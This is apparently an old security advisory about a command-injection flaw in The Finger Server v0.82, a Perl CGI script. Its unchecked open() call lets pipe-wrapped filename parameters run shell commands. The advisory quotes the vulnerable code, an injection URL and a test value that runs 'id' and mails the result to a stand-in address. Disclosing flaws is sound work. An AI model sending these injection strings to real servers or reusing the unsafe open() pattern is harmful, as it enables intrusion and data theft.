Vulnerability "The Finger Server" Affected "The Finger Server" Description Iain Wade found following. In 1999. he was tinkering w/ The Finger Server v0.82 and came across some bugs which let you execute shell commands under the privileges of the web server. It's available at http://www.glazed.org/finger/ It's just another case of perl doing it's magic on an open() call. There is undoubtably other problems, but here's the offending code exploited here is: open (PLANS, "$plan_path$filename") || do { print "Can't open $plan_path$filename: $!"; return; }; It is called with the following arguments; finger.cgi?action=archives&cmd=specific&filename= It does minimal checking before there, really only making sure the username is valid, but for example by using: finger.cgi?action=archives&cmd=specific&filename=|<shellcode>| you can execute whatever... The output will not get to you (the web client) obviously if you use |<shell command>| .. it does however get executed... So an example to test it could be |id|mail+email@address| Surrounding it in pipes is the only way one could get it to execute, otherwise it would return open errors .. Solution Nothing yet.